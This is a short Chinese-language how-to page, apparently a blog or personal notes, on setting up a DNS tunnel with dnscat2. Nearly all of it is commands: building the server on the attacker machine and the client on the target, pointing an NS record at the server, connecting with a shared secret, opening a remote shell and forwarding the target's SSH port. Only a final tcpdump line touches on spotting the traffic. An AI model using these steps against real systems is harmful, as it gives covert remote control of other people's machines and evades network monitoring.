跳至正文

DNS隧道

工具

  • Dnscat2

使用步骤

中继模式

  • dnscat2 攻击机安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
  • 目标机器上编译
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

*make编译之后会在此目录下生成一个dnscat可执行二进制文件。

  • DNS服务器配置 NS 记录,将子域名指向域名服务器解析

  • 服务端启动

ruby ./dnscat2.rb dnsch.qq.cn --secret=passwd
  • 客户端启动
./dnscat --secret=passwd dnsch.qq.cn
  • 服务端接收会话后执行
windows
session -i 1
shell
listen 127.0.0.1 2222 <客户端ip> 22    将客户端22端口流量转发到2222端口
  • 可以使用命令查看linux主机上的dns流量特征
tcpdump udp dst port 53
标签: